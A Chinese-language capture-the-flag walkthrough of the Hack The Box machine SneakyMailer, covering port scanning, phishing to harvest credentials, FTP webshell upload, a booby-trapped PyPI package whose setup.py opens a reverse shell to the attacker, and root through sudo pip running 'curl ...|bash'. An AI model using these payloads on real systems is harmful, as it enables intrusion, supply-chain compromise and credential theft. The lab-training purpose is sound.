HTB::SneakyMailer

实验环境

渗透过程

0x01 信息搜集

masscan

masscan 10.10.10.197 -p0-65535 --rate 1000

扫描结果：

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-10 04:36:18 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 143/tcp on 10.10.10.197
Discovered open port 22/tcp on 10.10.10.197
Discovered open port 25/tcp on 10.10.10.197
Discovered open port 993/tcp on 10.10.10.197
Discovered open port 21/tcp on 10.10.10.197
Discovered open port 8080/tcp on 10.10.10.197
Discovered open port 80/tcp on 10.10.10.197

nmap

nmap -sC -sV -p21,22,25,80,143,993,8080 --min-rate 1000 10.10.10.197

扫描结果：

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-10 12:39 CST
Nmap scan report for 10.10.10.197
Host is up (0.44s latency).

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp   open  http     nginx 1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: IMAP4rev1 STARTTLS THREAD=REFERENCES UIDPLUS THREAD=ORDEREDSUBJECT ACL2=UNION IDLE NAMESPACE UTF8=ACCEPTA0001 QUOTA OK ACL completed SORT CAPABILITY CHILDREN ENABLE
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: IMAP4rev1 THREAD=REFERENCES UIDPLUS THREAD=ORDEREDSUBJECT ACL2=UNION IDLE NAMESPACE UTF8=ACCEPTA0001 QUOTA OK AUTH=PLAIN ACL completed SORT CAPABILITY CHILDREN ENABLE
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.39 seconds

25、143、993都是与邮件相关的端口。

ftp匿名登录失败。

查看80端口：

所有链接均无法点击跳转，猜测为静态页面。

收集主页中存在的用户名与邮件信息：

cat SneakyMailer.txt | awk -F '	' '{print $4}' > mail.txt
cat SneakyMailer.txt | awk -F '	' '{print $4}' | awk -F '@' '{print $1}' > user.txt

查看8080端口：

进行目录扫描，没有发现信息。

查看网页注释，提示存在即将上线的注册页面：

查看相关注册页面：

注册页面为静态，无法进行操作。

0x02 开干

rshell

开放许多邮件服务端口，猜测为邮件服务器。使用setoolkit进行钓鱼攻击：

向收集来的邮箱发送钓鱼邮件：

收到上钩的信息：

URLdecode：

firstName=Paul&
lastName=Byrd&
email=paulbyrd@sneakymailer.htb&
password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&
rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

使用telnet登录邮件服务器：

使用Thunderbird登录邮件服务器：

获得如下信息：

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

使用该账号密码可成功登入FTP服务：

下载FTP中的文件：

wget -r --ftp-user='developer' --ftp-password='m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C' ftp://10.10.10.197

发现都是静态文件，与80端口页面相同。

根据文件夹的名称与用户名，猜测该文件是用于开发的内部测试页面。

尝试进行子域名扫描：

-> wfuzz -w ~/Wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.10.197 -H "HOST: FUZZ.sneakycorp.htb" --sc 200
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.197/
Total requests: 4997

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000019:   200        340 L    989 W      13737 Ch    "dev - dev"

Total time: 300.8313
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 16.61063

-> gobuster vhost -w ~/Wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u sneakycorp.htb
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:          http://sneakycorp.htb
[+] Threads:      10
[+] Wordlist:     /root/Wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.0.1
[+] Timeout:      10s
===============================================================
2020/12/12 14:08:54 Starting gobuster
===============================================================
Found: dev.sneakycorp.htb (Status: 200) [Size: 13742]
[ERROR] 2020/12/12 14:13:31 [!] Get http://sneakycorp.htb/: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/12 14:13:41 [!] Get http://sneakycorp.htb/: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/12/12 14:13:42 [!] Get http://sneakycorp.htb/: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
===============================================================
2020/12/12 14:13:52 Finished
===============================================================

访问dev，发现与主页相同，猜测为ftp服务的根路径。

上传webshell：

反弹shell：

low

上传信息辅助查询工具，得到信息：

[-] htpasswd found - could contain passwords:
/var/www/pypi.sneakycorp.htb/.htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

使用hashcat样本查询：

爆破：

$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

获得账号密码无法登录，查看/var/www/发现存在pypi页面，进行访问：

PyPI（英语：Python Package Index，简称PyPI）是Python的正式第三方（ official third-party）软件包的软件存储库。一些软件包管理器例如pip，就是默认从PyPI下载软件包。用户通过PyPI可以下载超过235,000个Python软件包。

构建反弹shell文件包：

evalpkg
	- setup.py
	- .pypirc

setup.py：

import setuptools
import os

os.system("echo 'bash -i >& /dev/tcp/10.10.14.3/10086 0>&1' | /bin/bash")

setuptools.setup(
    name="evalpkg", # Replace with your own username
    version="0.0.1",
    author="chalan630",
    author_email="author@example.com",
    description="A small example package",
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
)

.pypirc：

[distutils]
index-servers=local

[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui

shell：

HOME=$(pwd)
python3 setup.py sdist register -r local upload -r local

成功上传：

程序在本地运行时，会进行反弹shell，此时监听得到的为本机的shell。等待软件包上传后，进行监听，low用户查看包时可以得到其shell。

成功得到user.txt。

root

信息收集：

使用pip提权：

TF=$(mktemp -d)
echo "import os;os.system('curl 10.10.14.87|bash')" > $TF/setup.py
sudo pip3 install $TF

得到root.txt。

Reference

upload-with-setuptools